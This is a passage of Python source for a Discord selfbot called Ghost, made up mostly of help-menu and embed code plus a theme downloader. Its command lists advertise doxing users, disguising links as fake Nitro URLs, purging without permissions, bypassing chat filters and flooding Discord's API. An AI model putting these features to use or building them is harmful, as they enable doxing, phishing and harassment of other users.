# {__embedfooter__}```""", delete_after=__deletetimeout__)
except:
if __embedmode__:
embed = discord.Embed(title=f"Check console for search results", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_image(url=__embedlargeimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Check console for search results ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
print(f"[ Search results for {command} ]\n{text2}")
@Ghost.command(name="help", description="The help command.", usage="help (command)", aliases=["cmds", "commands"])
async def help(ctx, *, command = None):
totalcmds = len(Ghost.commands)-len(scriptsList)
if command is None:
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
Arguments in `[]` are required, arguments in `()` are optional.
`{Ghost.command_prefix}`**text (page 1/2)** » Text commands.
`{Ghost.command_prefix}`**fun (page 1)** » Fun commands.
`{Ghost.command_prefix}`**image (page 1)** » Image commands.
`{Ghost.command_prefix}`**moderation (page 1)** » Moderation commands.
`{Ghost.command_prefix}`**info (page 1)** » Info commands.
`{Ghost.command_prefix}`**user (page 1)** » User commands.
`{Ghost.command_prefix}`**selfbot (page 1)** » Selfbot commands.
`{Ghost.command_prefix}`**webhook (page 1)** » Webhook commands.
`{Ghost.command_prefix}`**abuse (page 1)** » Abuse commands.
`{Ghost.command_prefix}`**themes (page 1)** » Theme commands.
`{Ghost.command_prefix}`**giveaway (page 1)** » Giveaway commands.
`{Ghost.command_prefix}`**nsfw (page 1)** » NSFW commands.
`{Ghost.command_prefix}`**proxy (page 1)** » Proxy commands.
`{Ghost.command_prefix}`**tools (page 1)** » Discord and other tools.
`{Ghost.command_prefix}`**customcommands** » Your custom commands.
`{Ghost.command_prefix}`**customscripts** » Your scripts.
`{Ghost.command_prefix}`**search [term]** » Search for a command.
`{Ghost.command_prefix}`**help (command)** » Help for a specific command.
There is a total of `{totalcmds}` commands.
""")
embed.set_author(name="All Commands")
embed.set_image(url=__embedlargeimage__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {__embedtitle__} ]
Arguments in [] are required, arguments in () are optional.
{Ghost.command_prefix}text (page 1/2) » Text commands.
{Ghost.command_prefix}fun (page 1) » Fun commands.
{Ghost.command_prefix}image (page 1) » Image commands.
{Ghost.command_prefix}moderation (page 1) » Moderation commands.
{Ghost.command_prefix}info (page 1) » Info commands.
{Ghost.command_prefix}user (page 1) » User commands.
{Ghost.command_prefix}selfbot (page 1) » Selfbot commands.
{Ghost.command_prefix}webhook (page 1) » Webhook commands.
{Ghost.command_prefix}abuse (page 1) » Abuse commands.
{Ghost.command_prefix}themes (page 1) » Theme commands.
{Ghost.command_prefix}giveaway (page 1) » Giveaway commands.
{Ghost.command_prefix}nsfw (page 1) » NSFW commands.
{Ghost.command_prefix}proxy (page 1) » Proxy commands.
{Ghost.command_prefix}tools (page 1) » Discord and other tools.
{Ghost.command_prefix}customcommands » Your custom commands.
{Ghost.command_prefix}customscripts » Your scripts.
{Ghost.command_prefix}search [term] » Search for a command.
{Ghost.command_prefix}help (command) » Help for a specific command.
There is a total of {totalcmds} commands.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
for cmd in Ghost.commands:
if command == cmd.name or command in cmd.aliases:
if not cmd.aliases:
cmd.aliases.append("No aliases")
if __embedmode__:
embed = discord.Embed(title=f"{cmd.name}", color=__embedcolour__)
embed.add_field(name="Usage", value=f"{cmd.usage}", inline=False)
embed.add_field(name="Description", value=f"{cmd.description}", inline=False)
embed.add_field(name="Aliases", value=', '.join(cmd.aliases))
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {cmd.name} ]
Usage: {cmd.usage}
Description: {cmd.description}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="themes", description="Theme related commands.", usage="themes")
async def themes(ctx):
themes = ""
for theme in os.listdir("themes"):
if theme.endswith(".json"):
theme = theme.replace(".json", "")
themes += f"{theme}\n"
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__)
embed.add_field(name="Current Theme", value=f"{__theme__}", inline=False)
embed.add_field(name="Other Themes", value=f"{themes}", inline=False)
embed.add_field(name="Commands", value=f"`{Ghost.command_prefix}`**newtheme [name]** » Create a new theme with the given name.\n`{Ghost.command_prefix}`**deltheme [name]** » Delete the named theme.\n`{Ghost.command_prefix}`**theme [theme]** » Change your current theme.\n`{Ghost.command_prefix}`**ctheme** » Community themes.", inline=False)
embed.set_author(name="Theme Commands")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Theme Commands ]
Current Theme: {__theme__}
[ Other Themes ]
{themes}
[ Commands ]
{Ghost.command_prefix}newtheme [name] » Create a new theme with the given name.
{Ghost.command_prefix}deltheme [name] » Delete the named theme.
{Ghost.command_prefix}theme [theme] » Change your current theme.
{Ghost.command_prefix}cthemes » Community themes.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="ctheme", description="Community themes.", usage="ctheme", aliases=["communitythemes", "cloudthemes", "cthemes"])
async def ctheme(ctx, *, dl = None):
if dl is None:
url = "https://raw.githubusercontent.com/GhostSelfbot/Community-Themes/main/themes.txt"
themes = requests.get(url).text.split("\n")
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"Community Themes, run `{Ghost.command_prefix}ctheme (theme name)` to download the theme.\n ", color=__embedcolour__)
embed.add_field(name="Theme List", value='\n'.join(themes))
embed.set_author(name="Community Themes")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Community Themes ]
Community Themes, run {Ghost.command_prefix}ctheme (theme name) to download the theme.
[ Theme List ]
{themes}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
request = requests.get("https://raw.githubusercontent.com/GhostSelfbot/Community-Themes/main/themes.txt")
themes = []
for line in request.text.split("\n"):
themes.append(line.replace("\r", ""))
if dl in themes:
url = f'https://raw.githubusercontent.com/GhostSelfbot/Community-Themes/main/{dl}.json'
data = requests.get(url, allow_redirects=True)
open(f'themes/{dl}.json', 'wb').write(data.content)
if __embedmode__:
embed = discord.Embed(title="Theme downloaded successfully", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Theme downloaded successfully ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="text", description="Text related commands.", usage="text (page)")
async def text(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**js [message]** » Send all your messages in a JavaScript code block.
`{Ghost.command_prefix}`**lua [message]** » Send all your messages in a Lua code block.
`{Ghost.command_prefix}`**php [message]** » Send all your messages in a PHP code block.
`{Ghost.command_prefix}`**html [message]** » Send all your messages in a HTML code block.
`{Ghost.command_prefix}`**css [message]** » Send all your messages in a CSS code block.
`{Ghost.command_prefix}`**yaml [message]** » Send all your messages in a YAML code block.
`{Ghost.command_prefix}`**json [message]** » Send all your messages in a JSON code block.
`{Ghost.command_prefix}`**cpp [message]** » Send all your messages in a C++ code block.
`{Ghost.command_prefix}`**cs [message]** » Send all your messages in a C# code block.
`{Ghost.command_prefix}`**java [message]** » Send all your messages in a Java code block.
`{Ghost.command_prefix}`**python [message]** » Send all your messages in a Python code block.
`{Ghost.command_prefix}`**secret [message]** » Send all your messages in a secret block.
`{Ghost.command_prefix}`**secretletters [message]** » Put all lettes from your message into separate secret blocks
`{Ghost.command_prefix}`**regional [message]** » Replace all letters with emoji.
`{Ghost.command_prefix}`**bold [message]** » Send all your messages in bold.
`{Ghost.command_prefix}`**italic [message]** » Send all your messages in italics.
""")
embed.set_author(name="Text Commands (1/2)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
elif page == 2:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**rembed (delay) [title]** » Kill Discord's API with a sexy rainbow embedded message.
`{Ghost.command_prefix}`**cembed [title] [description] [colour]** » Create a custom embedded message.
`{Ghost.command_prefix}`**embed [title]** » Create an embedded message.
`{Ghost.command_prefix}`**suggest [suggestion]** » Suggest something.
`{Ghost.command_prefix}`**privatemsg [message]** » Send an encrypted message.
`{Ghost.command_prefix}`**privatemsgdecode [message]** » Decode an encrypted message.
`{Ghost.command_prefix}`**blank** » Send a blank message
`{Ghost.command_prefix}`**length [string]** » Get the length of a string.
`{Ghost.command_prefix}`**chatbypass [text]** » Bypass chat language restrictions.
`{Ghost.command_prefix}`**shrug** » Shrug your arms.
`{Ghost.command_prefix}`**tableflip** » Flip the table.
`{Ghost.command_prefix}`**unflip** » Put the table back.
`{Ghost.command_prefix}`**lmgtfy [search]** » Let me Google that for you.
`{Ghost.command_prefix}`**typing [start/stop]** » Start or stop typing.
`{Ghost.command_prefix}`**aesthetic [text]** » Send your text s p a c e d out.
`{Ghost.command_prefix}`**lowercase [msg]** » Send your message in lowercase.
`{Ghost.command_prefix}`**uppercase [msg]** » Send your message in uppercase.
`{Ghost.command_prefix}`**sentencecase [msg]** » Send your messages in sentence case.
`{Ghost.command_prefix}`**ascii [text]** » Send your message in ascii.
`{Ghost.command_prefix}`**zalgo [text]** » Unleash the zalgo into your message.
`{Ghost.command_prefix}`**leet [text]** » Turn your text into 1337 text.
`{Ghost.command_prefix}`**fakeedited [message]** » "Edit" a message.
`{Ghost.command_prefix}`**brainfuck [text]** » Generate brainfuck code from text.
`{Ghost.command_prefix}`**executebrainfuck [code]** » Execute brainfuck code.
""")
embed.set_author(name="Text Commands (2/2)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
if page == 1:
await ctx.send(f"""```ini
[ Text Commands (1/2) ]
{Ghost.command_prefix}js [message] » Send all your messages in a JavaScript code block.
{Ghost.command_prefix}lua [message] » Send all your messages in a Lua code block.
{Ghost.command_prefix}php [message] » Send all your messages in a PHP code block.
{Ghost.command_prefix}html [message] » Send all your messages in a HTML code block.
{Ghost.command_prefix}css [message] » Send all your messages in a CSS code block.
{Ghost.command_prefix}yaml [message] » Send all your messages in a YAML code block.
{Ghost.command_prefix}json [message] » Send all your messages in a JSON code block.
{Ghost.command_prefix}cpp [message] » Send all your messages in a C++ code block.
{Ghost.command_prefix}cs [message] » Send all your messages in a C# code block.
{Ghost.command_prefix}java [message] » Send all your messages in a Java code block.
{Ghost.command_prefix}python [message] » Send all your messages in a Python code block.
{Ghost.command_prefix}secret [message] » Send all your messages in a secret block.
{Ghost.command_prefix}secretletters [message] » Put all lettes from your message into separate secret blocks
{Ghost.command_prefix}regional [message] » Replace all letters with emoji.
{Ghost.command_prefix}bold [message] » Send all your messages in bold.
{Ghost.command_prefix}italic [message] » Send all your messages in italics.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
elif page == 2:
await ctx.send(f"""```ini
[ Text Commands (2/2) ]
{Ghost.command_prefix}suggest [suggestion] » Suggest something.
{Ghost.command_prefix}privatemsg [message] » Send an encrypted message.
{Ghost.command_prefix}privatemsgdecode [message] » Decode an encrypted message.
{Ghost.command_prefix}blank » Send a blank message
{Ghost.command_prefix}length [string] » Get the length of a string.
{Ghost.command_prefix}chatbypass [text] » Bypass chat language restrictions.
{Ghost.command_prefix}shrug » Shrug your arms.
{Ghost.command_prefix}tableflip » Flip the table.
{Ghost.command_prefix}unflip » Put the table back.
{Ghost.command_prefix}lmgtfy [search] » Let me Google that for you.
{Ghost.command_prefix}typing [start/stop] » Start or stop typing.
{Ghost.command_prefix}aesthetic [text] » Send your text s p a c e d out.
{Ghost.command_prefix}lowercase [msg] » Send your message in lowercase.
{Ghost.command_prefix}uppercase [msg] » Send your message in uppercase.
{Ghost.command_prefix}sentencecase [msg] » Send your messages in sentence case.
{Ghost.command_prefix}ascii [text] » Send your message in ascii.
{Ghost.command_prefix}zalgo [text] » Unleash the zalgo into your message.
{Ghost.command_prefix}leet [text] » Turn your text into 1337 text.
{Ghost.command_prefix}fakeedited [message] » "Edit" a message.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="fun", description="Fun related commands.", usage="fun")
async def fun(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**slots** » Play the slot machine.
`{Ghost.command_prefix}`**yomomma** » Random yo momma joke.
`{Ghost.command_prefix}`**socialcredit [@user]** » A users social credit score.
`{Ghost.command_prefix}`**roast [@user]** » Roast a user.
`{Ghost.command_prefix}`**howgay [@user]** » How gay a user is.
`{Ghost.command_prefix}`**howskid [@user]** » Check the percentage of a skid.
`{Ghost.command_prefix}`**halal [@user]** » Checks if a user is halal or haram.
`{Ghost.command_prefix}`**iq [@user]** » Check how smart a user is.
`{Ghost.command_prefix}`**pp [@user]** » The length of a user's penis.
`{Ghost.command_prefix}`**rainbowrole [@role]** » Kill Discord's API with a sexy rainbow role.
`{Ghost.command_prefix}`**coinflip** » Flip a coin.
`{Ghost.command_prefix}`**dice** » Roll a dice.
`{Ghost.command_prefix}`**8ball [question]** » Ask the magic eight ball a question.
`{Ghost.command_prefix}`**choice [choice1] [choice2]** » Pick a random choice.
`{Ghost.command_prefix}`**range [number1] [number2]** » Choose a random number between two.
`{Ghost.command_prefix}`**dox [@user]** » Dox the mentioned user.
`{Ghost.command_prefix}`**fakenitro [url]** » Hide a link in a nitro URL.
`{Ghost.command_prefix}`**purgehack** » Purge without permissions.
`{Ghost.command_prefix}`**dadjoke** » A random dad joke.
`{Ghost.command_prefix}`**randommessage** » A random message.
`{Ghost.command_prefix}`**randomquestion** » A random question.
`{Ghost.command_prefix}`**rickroll** » Send never gonna give you up lyrics one by one.
`{Ghost.command_prefix}`**stoprickroll** » Stop sending rick astley lyrics.
`{Ghost.command_prefix}`**countdown [number]** » Count down from a number.
`{Ghost.command_prefix}`**countup [number]** » Count up from a number.
`{Ghost.command_prefix}`**pytoexe [path]** » Convert a PY file to an executable.
`{Ghost.command_prefix}`**skin [name]** » Gets the skin of a MC user.
""")
embed.set_author(name="Fun Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Fun Commands ]
{Ghost.command_prefix}slots » Play the slot machine.
{Ghost.command_prefix}yomomma » Random yo momma joke.
{Ghost.command_prefix}socialcredit [@user] » A users social credit score.
{Ghost.command_prefix}roast [@user] » Roast a user.
{Ghost.command_prefix}howgay [@user] » How gay a user is.
{Ghost.command_prefix}howskid [@user] » Check the percentage of a skid.
{Ghost.command_prefix}halal [@user] » Checks if a user is halal or haram.
{Ghost.command_prefix}iq [@user] » Check how smart a user is.
{Ghost.command_prefix}pp [@user] » The length of a user's penis.
{Ghost.command_prefix}rainbowrole [@role] » Kill Discord's API with a sexy rainbow role.
{Ghost.command_prefix}coinflip » Flip a coin.
{Ghost.command_prefix}dice » Roll a dice.
{Ghost.command_prefix}8ball [question] » Ask the magic eight ball a question.
{Ghost.command_prefix}choice [choice1] [choice2] » Pick a random choice.
{Ghost.command_prefix}range [number1] [number2] » Choose a random number between two.
{Ghost.command_prefix}dox [@user] » Dox the mentioned user.
{Ghost.command_prefix}fakenitro [url] » Hide a link in a nitro URL.
{Ghost.command_prefix}purgehack » Purge without permissions.
{Ghost.command_prefix}dadjoke » A random dad joke.
{Ghost.command_prefix}randommessage » A random message.
{Ghost.command_prefix}randomquestion » A random question.
{Ghost.command_prefix}rickroll » Send never gonna give you up lyrics one by one.
{Ghost.command_prefix}stoprickroll » Stop sending rick astley lyrics.
{Ghost.command_prefix}countdown [number] » Count down from a number.
{Ghost.command_prefix}countup [number] » Count up from a number.
{Ghost.command_prefix}pytoexe [path] » Convert a PY file to an executable.
{Ghost.command_prefix}skin [name] » Gets the skin of a MC user.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="image", description="Image related commands.", usage="image", aliases=["img"])
async def image(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**meme** » A random meme.
`{Ghost.command_prefix}`**cat** » A random cat image.
`{Ghost.command_prefix}`**dog** » A random dog image.
`{Ghost.command_prefix}`**shiba** » A random shiba image.
`{Ghost.command_prefix}`**fox** » A random fox image. (Thanks Imf44 <3)
`{Ghost.command_prefix}`**avatar [@user]** » Get the mentioned user's avatar.
`{Ghost.command_prefix}`**servericon** » Get the server's icon.
`{Ghost.command_prefix}`**achievement ["text"] (icon)** » Create a fake minecraft achievement image.
`{Ghost.command_prefix}`**challenge ["text"] (icon)** » Create a fake minecraft challenge image.
`{Ghost.command_prefix}`**captcha [text]** » Create a fake reCaptcha.
`{Ghost.command_prefix}`**amiajoke [@user]** » Make a user a joke.
`{Ghost.command_prefix}`**didyoumean ["text 1"] ["text 2"]** » Create a google did you mean image.
`{Ghost.command_prefix}`**drake ["text 1"] ["text 2"]** » Create a drake meme image.
`{Ghost.command_prefix}`**facts [text]** » Create a facts meme image.
`{Ghost.command_prefix}`**jokeoverhead [image url]** » Create a joke over head image.
`{Ghost.command_prefix}`**pornhub ["text 1"] ["text 2"]** » Create a pornhub logo image.
`{Ghost.command_prefix}`**salty [@user]** » Make someone salty.
`{Ghost.command_prefix}`**ship [@user 1] [@user 2]** » Ship two people.
`{Ghost.command_prefix}`**trash [@user]** » Put someone in the trash.
`{Ghost.command_prefix}`**what [image url]** » Make a what meme.
""")
embed.set_author(name="Image Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Image Commands ]
{Ghost.command_prefix}meme » A random meme.
{Ghost.command_prefix}cat » A random cat image.
{Ghost.command_prefix}dog » A random dog image.
{Ghost.command_prefix}shiba » A random shiba image.
{Ghost.command_prefix}fox » A random fox image. (Thanks Imf44 <3)
{Ghost.command_prefix}avatar [@user] » Get the mentioned user's avatar.
{Ghost.command_prefix}servericon » Get the server's icon.
{Ghost.command_prefix}achievement ["text"] (icon) » Create a fake minecraft achievement image.
{Ghost.command_prefix}challenge ["text"] (icon) » Create a fake minecraft challenge image.
{Ghost.command_prefix}captcha [text] » Create a fake reCaptcha.
{Ghost.command_prefix}amiajoke [@user] » Make a user a joke.
{Ghost.command_prefix}didyoumean ["text 1"] ["text 2"] » Create a google did you mean image.
{Ghost.command_prefix}drake ["text 1"] ["text 2"] » Create a drake meme image.
{Ghost.command_prefix}facts [text] » Create a facts meme image.
{Ghost.command_prefix}jokeoverhead [image url] » Create a joke over head image.
{Ghost.command_prefix}pornhub ["text 1"] ["text 2"] » Create a pornhub logo image.
{Ghost.command_prefix}salty [@user] » Make someone salty.
{Ghost.command_prefix}ship [@user 1] [@user 2] » Ship two people.
{Ghost.command_prefix}trash [@user] » Put someone in the trash.
{Ghost.command_prefix}what [image url] » Make a what meme.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="nsfw", description="NSFW related commands.", usage="nsfw")
async def nsfw(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**boobs** » Pictures or videos of boobs.
`{Ghost.command_prefix}`**ass** » Pictures or videos of ass.
`{Ghost.command_prefix}`**pussy** » Pictures or videos of pussy.
`{Ghost.command_prefix}`**porngif** » Porn gifs.
`{Ghost.command_prefix}`**hentai** » Pictures or videos of hentai.
""")
embed.set_author(name="NSFW Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ NSFW Commands ]
{Ghost.command_prefix}boobs » Pictures or videos of boobs.
{Ghost.command_prefix}ass » Pictures or videos of ass.
{Ghost.command_prefix}pussy » Pictures or videos of pussy.
{Ghost.command_prefix}porngif » Porn gifs.
{Ghost.command_prefix}hentai » Pictures or videos of hentai.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="moderation", description="Moderation related commands.", usage="moderation")
async def moderation(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**ban [@user]** » Ban the mentioned user.
`{Ghost.command_prefix}`**unban [id]** » Unban the mentioned id.
`{Ghost.command_prefix}`**banlist** » See the server's ban list.
`{Ghost.command_prefix}`**kick [@user]** » Kick the mentioned user.
`{Ghost.command_prefix}`**mute [@user]** » Mute the menitioned user.
`{Ghost.command_prefix}`**unmute [@user]** » Unmute the mentioned user.
`{Ghost.command_prefix}`**newrole [name]** » Create a new role.
`{Ghost.command_prefix}`**delrole [@role]** » Delete the mentioned role.
`{Ghost.command_prefix}`**purge [amount]** » Purge X amount of messages.
`{Ghost.command_prefix}`**lock** » Lock the command channel.
`{Ghost.command_prefix}`**unlock** » Unlock the command channel.
`{Ghost.command_prefix}`**lockdown** » Lock the entire server.
`{Ghost.command_prefix}`**unlockdown** » Unlock the entire server.
`{Ghost.command_prefix}`**spacechannel [channel name]** » Create a channel with spaces.
""")
embed.set_author(name="Moderation Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Moderation Commands ]
{Ghost.command_prefix}ban [@user] » Ban the mentioned user.
{Ghost.command_prefix}unban [id] » Unban the mentioned id.
{Ghost.command_prefix}banlist » See the server's ban list.
{Ghost.command_prefix}kick [@user] » Kick the mentioned user.
{Ghost.command_prefix}mute [@user] » Mute the menitioned user.
{Ghost.command_prefix}unmute [@user] » Unmute the mentioned user.
{Ghost.command_prefix}newrole [name] » Create a new role.
{Ghost.command_prefix}delrole [@role] » Delete the mentioned role.
{Ghost.command_prefix}purge [amount] » Purge X amount of messages.
{Ghost.command_prefix}lock » Lock the command channel.
{Ghost.command_prefix}unlock » Unlock the command channel.
{Ghost.command_prefix}lockdown » Lock the entire server.
{Ghost.command_prefix}unlockdown » Unlock the entire server.
{Ghost.command_prefix}spacechannel [channel name] » Create a channel with spaces.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="info", description="Info related commands.", usage="info")
async def info(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**userinfo [@user]** » Information about the mentioned user.
`{Ghost.command_prefix}`**serverinfo** » Information about the command server.
`{Ghost.command_prefix}`**watchdogstats** » Get stats about Hypixel's Anticheat, Watchdog.
`{Ghost.command_prefix}`**getmessage [message id]** » Get a message by ID.
`{Ghost.command_prefix}`**geoip [ip]** » Get information from an IP address.
`{Ghost.command_prefix}`**ping [ip/domain]** » Ping a domain or ip address.
`{Ghost.command_prefix}`**crypto [currency]** » Get the current data on a cryptocurrency.
""")
embed.set_author(name="Info Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Info Commands ]
{Ghost.command_prefix}userinfo [@user] » Information about the mentioned user.
{Ghost.command_prefix}serverinfo » Information about the command server.
{Ghost.command_prefix}watchdogstats » Get stats about Hypixel's Anticheat, Watchdog.
{Ghost.command_prefix}getmessage [message id] » Get a message by ID.
{Ghost.command_prefix}geoip [ip] » Get information from an IP address.
{Ghost.command_prefix}ping [ip/domain] » Ping a domain or ip address.
{Ghost.command_prefix}crypto [currency] » Get the current data on a cryptocurrency.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="user", description="User related commands.", usage="user")
async def user(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**purgeself [amount]** » Purge your messages.
`{Ghost.command_prefix}`**statuscycle** » Start a custom status cycle.
`{Ghost.command_prefix}`**statuscycletext [text]** » Set the text used in status cycle.
`{Ghost.command_prefix}`**clearstatus** » Clear your status.
`{Ghost.command_prefix}`**nickname [text]** » Set your nickname to anything.
`{Ghost.command_prefix}`**clearnickname** » Clear your nickname.
`{Ghost.command_prefix}`**ppin [message id]** » Add a message to your personal pins.
`{Ghost.command_prefix}`**ppins** » List all your pinned messages.
`{Ghost.command_prefix}`**ppindel [pin id]** » Delete a pin from your personal pins.
`{Ghost.command_prefix}`**backupfriends** » Backup all your friend's user IDs to a file.
`{Ghost.command_prefix}`**backupservers** » Backup all your servers and try to create invites for each one.
`{Ghost.command_prefix}`**changehypesquad [bravery/brilliance/balance]** » Change your hypesquad house.
""")
embed.set_author(name="User Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ User Commands ]
{Ghost.command_prefix}purgeself [amount] » Purge your messages.
{Ghost.command_prefix}statuscycle » Start a custom status cycle.
{Ghost.command_prefix}statuscycletext [text] » Set the text used in status cycle.
{Ghost.command_prefix}clearstatus » Clear your status.
{Ghost.command_prefix}nickname [text] » Set your nickname to anything.
{Ghost.command_prefix}clearnickname » Clear your nickname.
{Ghost.command_prefix}ppin [message id] » Add a message to your personal pins.
{Ghost.command_prefix}ppins » List all your pinned messages.
{Ghost.command_prefix}ppindel [pin id] » Delete a pin from your personal pins.
{Ghost.command_prefix}backupfriends » Backup all your friend's user IDs to a file.
{Ghost.command_prefix}backupservers » Backup all your servers and try to create invites for each one.
{Ghost.command_prefix}changehypesquad [bravery/brilliance/balance] » Change your hypesquad house.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="selfbot", description="Selfbot related commands.", usage="selfbot")
async def selfbot(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**afkmode** » Toggle afk mode.
`{Ghost.command_prefix}`**settings** » The bot's settings.
`{Ghost.command_prefix}`**restart** » Restart Ghost selfbot.
`{Ghost.command_prefix}`**prefix [prefix]** » Set the command prefix.
`{Ghost.command_prefix}`**dumpchat [amount] (channel id) (oldest first, true/false)** » Get the chat's history.
`{Ghost.command_prefix}`**invite** » Get Ghost's Discord server invite link.
`{Ghost.command_prefix}`**addccmd [name] [response]** » Add a custom command.
`{Ghost.command_prefix}`**delccmd [name]** » Delete a custom command.
`{Ghost.command_prefix}`**detections** » A list of all detections.
`{Ghost.command_prefix}`**snipers** » A list of all snipers.
`{Ghost.command_prefix}`**enablesniper [type]** » Enable a sniper.
`{Ghost.command_prefix}`**disablesniper [type]** » Disable a sniper.
`{Ghost.command_prefix}`**enabledetect [type]** » Enable a detection.
`{Ghost.command_prefix}`**disabledetect [type]** » Disable a detection.
`{Ghost.command_prefix}`**riskmode** » Disable and enable risk mode.
